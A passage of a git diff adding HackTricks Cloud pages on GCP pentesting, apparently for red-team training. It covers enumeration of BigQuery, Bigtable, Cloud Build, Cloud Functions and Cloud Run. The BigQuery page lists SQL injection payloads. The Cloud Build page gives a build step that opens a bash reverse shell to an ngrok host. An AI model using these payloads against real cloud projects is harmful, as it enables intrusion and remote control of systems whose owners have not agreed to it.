+SELECT table_name, column_name FROM <project-name>.<dataset-name>.INFORMATION_SCHEMA.COLUMNS
+```
+{% endcode %}
+
+* **Other datasets** in the same project:
+
+{% code overflow="wrap" %}
+```sql
+# SELECT catalog_name, schema_name, FROM <proj-name>.INFORMATION_SCHEMA.SCHEMATA
+
+SELECT catalog_name, schema_name, NULL FROM <project-name>.INFORMATION_SCHEMA.SCHEMATA
+```
+{% endcode %}
+
+**SQL Injection types:**
+
+* Error based - casting: `select CAST(@@project_id AS INT64)`
+* Error based - division by zero: `' OR if(1/(length((select('a')))-1)=1,true,false) OR '`
+* Union based (you need to use ALL in bigquery): `UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#`
+* Boolean based: ``' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#``
+* Potential time based - Usage of public datasets example: ``SELECT * FROM `bigquery-public-data.covid19_open_data.covid19_open_data` LIMIT 1000``
+
+**Documentation:**
+
+* All function list: [https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators)
+* Scripting statements: [https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting](https://cloud.google.com/bigquery/docs/reference/standard-sql/scripting)
+
+### Privilege Escalation & Post Exploitation
+
+{% content-ref url="../gcp-privilege-escalation/gcp-bigquery-privesc.md" %}
+[gcp-bigquery-privesc.md](../gcp-privilege-escalation/gcp-bigquery-privesc.md)
+{% endcontent-ref %}
+
+### Persistence
+
+{% content-ref url="../gcp-persistence/gcp-bigquery-persistence.md" %}
+[gcp-bigquery-persistence.md](../gcp-persistence/gcp-bigquery-persistence.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://cloud.google.com/bigquery/docs/column-level-security-intro](https://cloud.google.com/bigquery/docs/column-level-security-intro)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md
new file mode 100644
index 0000000000..7d8c2c5e70
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md
@@ -0,0 +1,58 @@
+# GCP - Bigtable Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## [Bigtable](https://cloud.google.com/sdk/gcloud/reference/bigtable/) <a href="#cloud-bigtable" id="cloud-bigtable"></a>
+
+A fully managed, scalable NoSQL database service for large analytical and operational workloads with up to 99.999% availability. [Learn more](https://cloud.google.com/bigtable).
+
+```bash
+# Cloud Bigtable
+gcloud bigtable instances list
+gcloud bigtable instances describe <instance>
+gcloud bigtable instances get-iam-policy <instance>
+
+## Clusters
+gcloud bigtable clusters list
+gcloud bigtable clusters describe <cluster>
+
+## Backups
+gcloud bigtable backups list --instance <INSTANCE>
+gcloud bigtable backups describe --instance <INSTANCE> <backupname>
+gcloud bigtable backups get-iam-policy --instance <INSTANCE> <backupname>
+
+## Hot Tables
+gcloud bigtable hot-tablets list
+
+## App Profiles
+gcloud bigtable app-profiles list --instance <INSTANCE>
+gcloud bigtable app-profiles describe --instance <INSTANCE> <app-prof>
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md
new file mode 100644
index 0000000000..18aef35d1a
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md
@@ -0,0 +1,199 @@
+# GCP - Cloud Build Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Google Cloud Build is a managed CI/CD platform that **automates software build** and release processes, integrating with **source code repositories** and supporting a wide range of programming languages. It **allows developers to build, test, and deploy code automatically** while providing flexibility to customize build steps and workflows.
+
+Each Cloud Build Trigger is **related to a Cloud Repository or directly connected with an external repository** (Github, Bitbucket and Gitlab).
+
+{% hint style="success" %}
+I couldn't see any way to steal the Github/Bitbucket token from here or from Cloud Repositories because when the repo is downloaded it's accessed via a [https://source.cloud.google.com/](https://source.cloud.google.com/) URL and Github is not accessed by the client.
+{% endhint %}
+
+### Events
+
+The Cloud Build can be triggered if:
+
+* **Push to a branch**: Specify the branch
+* **Push a new tag**: Specify the tag
+* P**ull request**: Specify the branch that receives the PR
+* **Manual Invocation**
+* **Pub/Sub message:** Specify the topic
+* **Webhook event**: Will expose a HTTPS URL and the request must be authenticated with a secret
+
+### Execution
+
+There are 3 options:
+
+* A yaml/json **specifying the commands** to execute. Usually: `/cloudbuild.yaml`
+  * Only one that can be specified “inline” in the web console and in the cli
+  * Most common option
+  * Relevant for unauthenticated access
+* A **Dockerfile** to build
+* A **Buildpack** to build
+
+### SA Permissions
+
+The **Service Account has the `cloud-platform` scope**, so it can **use all the privileges.** If **no SA is specified** (like when doing submit) the **default SA** `<proj-number>@cloudbuild.gserviceaccount.com` will be **used.**
+
+By default no permissions are given but it's fairly easy to give it some:
+
+<figure><img src="../../../.gitbook/assets/image (16).png" alt=""><figcaption></figcaption></figure>
+
+### Approvals
+
+It's possible to config a Cloud Build to **require approvals for build executions** (disabled by default).
+
+### PR Approvals
+
+When the trigger is PR because **anyone can perform PRs to public repositories** it would be very dangerous to just **allow the execution of the trigger with any PR**. Therefore, by default, the execution will only be **automatic for owners and collaborators**, and in order to execute the trigger with other users PRs an owner or collaborator must comment `/gcbrun`.
+
+<figure><img src="../../../.gitbook/assets/image (339).png" alt="" width="563"><figcaption></figcaption></figure>
+
+### Connections & Repositories
+
+Connections can be created over:
+
+* **GitHub:** It will show an OAuth prompt asking for permissions to **get a Github token** that will be stored inside the **Secret Manager.**
+* **GitHub Enterprise:** It will ask to install a **GithubApp**. An **authentication token** from your GitHub Enterprise host will be created and stored in this project as a S**ecret Manager** secret.
+* **GitLab / Enterprise:** You need to **provide the API access token and the Read API access toke**n which will stored in the **Secret Manager.**
+
+Once a connection is generated, you can use it to **link repositories that the Github account has access** to.
+
+This option is available through the button:
+
+<figure><img src="../../../.gitbook/assets/image (17).png" alt=""><figcaption></figcaption></figure>
+
+{% hint style="success" %}
+Note that repositories connected with this method are **only available in Triggers using 2nd generation.**
+{% endhint %}
+
+### Connect a Repository
+
+This is not the same as a **`connection`**. This allows **different** ways to get **access to a Github or Bitbucket** repository but **doesn't generate a connection object, but it does generate a repository object (of 1st generation).**
+
+This option is available through the button:
+
+<figure><img src="../../../.gitbook/assets/image (18).png" alt=""><figcaption></figcaption></figure>
+
+### Storage
+
+Sometimes Cloud Build will **generate a new storage to store the files for the trigger**. This happens for example in the example that GCP offers with:
+
+```bash
+git clone https://github.com/GoogleCloudBuild/cloud-console-sample-build && \
+  cd cloud-console-sample-build && \
+  gcloud builds submit --config cloudbuild.yaml --region=global
+```
+
+A Storage bucket called [security-devbox\_cloudbuild](https://console.cloud.google.com/storage/browser/security-devbox_cloudbuild;tab=objects?forceOnBucketsSortingFiltering=false\&project=security-devbox) is created to store a `.tgz` with the files to be used.
+
+### Get shell
+
+```yaml
+steps:
+  - name: bash
+    script: |
+      #!/usr/bin/env bash
+      bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/12395 0>&1
+options:
+  logging: CLOUD_LOGGING_ONLY
+```
+
+Install gcloud inside cloud build:
+
+```bash
+# https://stackoverflow.com/questions/28372328/how-to-install-the-google-cloud-sdk-in-a-docker-image
+curl https://dl.google.com/dl/cloudsdk/release/google-cloud-sdk.tar.gz > /tmp/google-cloud-sdk.tar.gz
+mkdir -p /usr/local/gcloud 
+tar -C /usr/local/gcloud -xvf /tmp/google-cloud-sdk.tar.gz
+/usr/local/gcloud/google-cloud-sdk/install.sh
+```
+
+### Enumeration
+
+You could find **sensitive info in build configs and logs**.
+
+```bash
+# Get configured triggers configurations
+gcloud builds triggers list # Check for the words github and bitbucket
+gcloud builds triggers describe <trigger-name>
+
+# Get build executions
+gcloud builds list
+gcloud builds describe <build-uuid> # Get even the build yaml if defined in there
+gcloud builds log <build-uuid> # Get build logs
+
+# List all connections of each region
+regions=("${(@f)$(gcloud compute regions list --format='value(name)')}")
+for region in $regions; do
+    echo "Listing build connections in region: $region"
+    connections=("${(@f)$(gcloud builds connections list --region="$region" --format='value(name)')}")
+    if [[ ${#connections[@]} -eq 0 ]]; then
+        echo "No connections found in region $region."
+    else
+        for connection in $connections; do
+            echo "Describing connection $connection in region $region"
+            gcloud builds connections describe "$connection" --region="$region"
+            echo "-----------------------------------------"
+        done
+    fi
+    echo "========================================="
+done
+
+# List all worker-pools
+regions=("${(@f)$(gcloud compute regions list --format='value(name)')}")
+for region in $regions; do
+    echo "Listing build worker-pools in region: $region"
+    gcloud builds worker-pools list --region="$region"
+    echo "-----------------------------------------"
+done
+```
+
+### Privilege Escalation
+
+{% content-ref url="../gcp-privilege-escalation/gcp-cloudbuild-privesc.md" %}
+[gcp-cloudbuild-privesc.md](../gcp-privilege-escalation/gcp-cloudbuild-privesc.md)
+{% endcontent-ref %}
+
+### Unauthenticated Access
+
+{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md" %}
+[gcp-cloud-build-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+### Post Exploitation
+
+{% content-ref url="../gcp-post-exploitation/gcp-cloud-build-post-exploitation.md" %}
+[gcp-cloud-build-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-build-post-exploitation.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md
new file mode 100644
index 0000000000..f127577347
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md
@@ -0,0 +1,135 @@
+# GCP - Cloud Functions Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cloud Functions <a href="#reviewing-cloud-functions" id="reviewing-cloud-functions"></a>
+
+[Google Cloud Functions](https://cloud.google.com/functions/) are designed to host your code, which **gets executed in response to events**, without necessitating the management of a host operating system. Additionally, these functions support the storage of environment variables, which the code can utilize.
+
+### Storage
+
+The Cloud Functions **code is stored in GCP Storage**. Therefore, anyone with **read access over buckets** in GCP is going to be able to **read the Cloud Functions code**.\
+The code is stored in a bucket like one of the following:
+
+* `gcf-sources-<number>-<region>/<function-name>-<uuid>/version-<n>/function-source.zip`
+* `gcf-v2-sources-<number>-<region>/<function-name>function-source.zip`
+
+For example:\
+`gcf-sources-645468741258-us-central1/function-1-003dcbdf-32e1-430f-a5ff-785a6e238c76/version-4/function-source.zip`
+
+{% hint style="warning" %}
+Any user with **read privileges over the bucket** storing the Cloud Function could **read the executed code**.
+{% endhint %}
+
+### Artifact Registry
+
+If the cloud function is configured so the executed Docker container is stored inside and Artifact Registry repo inside the project, anyway with read access over the repo will be able to download the image and check the source code. For more info check:
+
+{% content-ref url="gcp-artifact-registry-enum.md" %}
+[gcp-artifact-registry-enum.md](gcp-artifact-registry-enum.md)
+{% endcontent-ref %}
+
+### SA
+
+If not specified, by default the **App Engine Default Service Account** with **Editor permissions** over the project will be attached to the Cloud Function.
+
+### Triggers, URL & Authentication
+
+When a Cloud Function is created the **trigger** needs to be specified. One common one is **HTTPS**, this will **create an URL where the function** can be triggered via web browsing.\
+Other triggers are pub/sub, Storage, Filestore...
+
+The URL format is **`https://<region>-<project-gcp-name>.cloudfunctions.net/<func_name>`**
+
+When the HTTPS tigger is used, it's also indicated if the **caller needs to have IAM authorization** to call the Function or if **everyone** can just call it:
+
+<figure><img src="../../../.gitbook/assets/image (19).png" alt=""><figcaption></figcaption></figure>
+
+### Inside the Cloud Function
+
+The code is **downloaded inside** the folder **`/workspace`** with the same file names as the ones the files have in the Cloud Function and is executed with the user `www-data`.\
+The disk **isn't mounted as read-only.**
+
+### Enumeration
+
+```bash
+# List functions
+gcloud functions list
+gcloud functions describe <func_name> # Check triggers to see how is this function invoked
+gcloud functions get-iam-policy <func_name>
+
+# Get logs of previous runs. By default, limits to 10 lines
+gcloud functions logs read <func_name> --limit [NUMBER]
+
+# Call a function
+curl https://<region>-<project>.cloudfunctions.net/<func_name>
+gcloud functions call <func_name> --data='{"message": "Hello World!"}'
+
+# If you know the name of projects you could try to BF cloud functions names
+
+# Get events that could be used to trigger a cloud function
+gcloud functions event-types list
+
+# Access function with authentication
+curl -X POST https://<region>-<project>.cloudfunctions.net/<func_name> \
+-H "Authorization: bearer $(gcloud auth print-identity-token)" \
+-H "Content-Type: application/json" \
+-d '{}'
+```
+
+### Privilege Escalation
+
+In the following page, you can check how to **abuse cloud function permissions to escalate privileges**:
+
+{% content-ref url="../gcp-privilege-escalation/gcp-cloudfunctions-privesc.md" %}
+[gcp-cloudfunctions-privesc.md](../gcp-privilege-escalation/gcp-cloudfunctions-privesc.md)
+{% endcontent-ref %}
+
+### Unauthenticated Access
+
+{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md" %}
+[gcp-cloud-functions-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+### Post Exploitation
+
+{% content-ref url="../gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md" %}
+[gcp-cloud-functions-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md)
+{% endcontent-ref %}
+
+### Persistence
+
+{% content-ref url="../gcp-persistence/gcp-cloud-functions-persistence.md" %}
+[gcp-cloud-functions-persistence.md](../gcp-persistence/gcp-cloud-functions-persistence.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md
new file mode 100644
index 0000000000..82989eafc7
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md
@@ -0,0 +1,137 @@
+# GCP - Cloud Run Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cloud Run <a href="#reviewing-cloud-run-configurations" id="reviewing-cloud-run-configurations"></a>
+
+Cloud Run is a serverless managed compute platform that lets you **run containers** directly on top of Google's scalable infrastructure.
+
+You can run your container or If you're using Go, Node.js, Python, Java, .NET Core, or Ruby, you can use the [source-based deployment](https://cloud.google.com/run/docs/deploying-source-code) option that **builds the container for you.**
+
+Google has built Cloud Run to **work well together with other services on Google Cloud**, so you can build full-featured applications.
+
+### Services and jobs <a href="#services-and-jobs" id="services-and-jobs"></a>
+
+On Cloud Run, your code can either run continuously as a _**service**_ or as a _**job**_. Both services and jobs run in the same environment and can use the same integrations with other services on Google Cloud.
+
+* **Cloud Run services.** Used to run code that responds to web requests, or events.
+* **Cloud Run jobs.** Used to run code that performs work (a job) and quits when the work is done.
+
+## Cloud Run Service
+
+Google [Cloud Run](https://cloud.google.com/run) is another serverless offer where you can search for env variables also. Cloud Run creates a small web server, running on port 8080 inside the container by default, that sits around waiting for an HTTP GET request. When the request is received, a job is executed and the job log is output via an HTTP response.
+
+### Relevant details
+
+* By **default**, the **access** to the web server is **public**, but it can also be **limited to internal traffic** (VPC...)\
+  Moreover, the **authentication** to contact the web server can be **allowing all** or to **require authentication via IAM**.
+* By default, the **encryption** uses a **Google managed key**, but a **CMEK** (Customer Managed Encryption Key) from **KMS** can also be **chosen**.
+* By **default**, the **service account** used is the **Compute Engine default one** which has **Editor** access over the project and it has the **scope `cloud-platform`.**
+* It's possible to define **clear-text environment variables** for the execution, and even **mount cloud secrets** or **add cloud secrets to environment variables.**
+* It's also possible to **add connections with Cloud SQL** and **mount a file system.**
+* The **URLs** of the services deployed are similar to **`https://<svc-name>-<random>.a.run.app`**
+* A Run Service can have **more than 1 version or revision**, and **split traffic** among several revisions.
+
+### Enumeration
+
+```bash
+# List services
+gcloud run services list
+gcloud run services list --platform=managed
+gcloud run services list --platform=gke
+
+# Get info of a service
+gcloud run services describe --region <region> <svc-name>
+
+# Get info of all the services together
+gcloud run services list --format=yaml
+gcloud run services list --platform=managed --format=json
+gcloud run services list --platform=gke --format=json
+
+# Get policy
+gcloud run services get-iam-policy --region <region> <svc-name>
+
+# Get revisions
+gcloud run revisions list --region <region>
+gcloud run revisions describe --region <region> <revision>
+
+# Get domains
+gcloud run domain-mappings list
+gcloud run domain-mappings describe <name>
+
+# Attempt to trigger a job unauthenticated
+curl <url>
+
+# Attempt to trigger a job with your current gcloud authorization
+curl -H "Authorization: Bearer $(gcloud auth print-identity-token)" <url>
+```
+
+## Cloud Run Jobs
+
+Cloud Run jobs are be a better fit for **containers that run to completion and don't serve requests**. Jobs don't have the ability to serve requests or listen on a port. This means that unlike Cloud Run services, jobs should not bundle a web server. Instead, jobs containers should exit when they are done.
+
+### Enumeration
+
+```bash
+gcloud beta run jobs list
+gcloud beta run jobs describe --region <region> <job-name>
+gcloud beta run jobs get-iam-policy --region <region> <job-name>
+```
+
+## Privilege Escalation
+
+In the following page, you can check how to **abuse cloud run permissions to escalate privileges**:
+
+{% content-ref url="../gcp-privilege-escalation/gcp-run-privesc.md" %}
+[gcp-run-privesc.md](../gcp-privilege-escalation/gcp-run-privesc.md)
+{% endcontent-ref %}
+
+## Unauthenticated Access
+
+{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md" %}
+[gcp-cloud-run-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md)
+{% endcontent-ref %}
+
+## Post Exploitation
+
+{% content-ref url="../gcp-post-exploitation/gcp-cloud-run-post-exploitation.md" %}
+[gcp-cloud-run-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-run-post-exploitation.md)
+{% endcontent-ref %}
+
+## Persistence
+
+{% content-ref url="../gcp-persistence/gcp-cloud-run-persistence.md" %}
+[gcp-cloud-run-persistence.md](../gcp-persistence/gcp-cloud-run-persistence.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://cloud.google.com/run/docs/overview/what-is-cloud-run](https://cloud.google.com/run/docs/overview/what-is-cloud-run)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md
new file mode 100644
index 0000000000..1614bc5d2b
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md
@@ -0,0 +1,73 @@
+# GCP - Cloud Scheduler Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
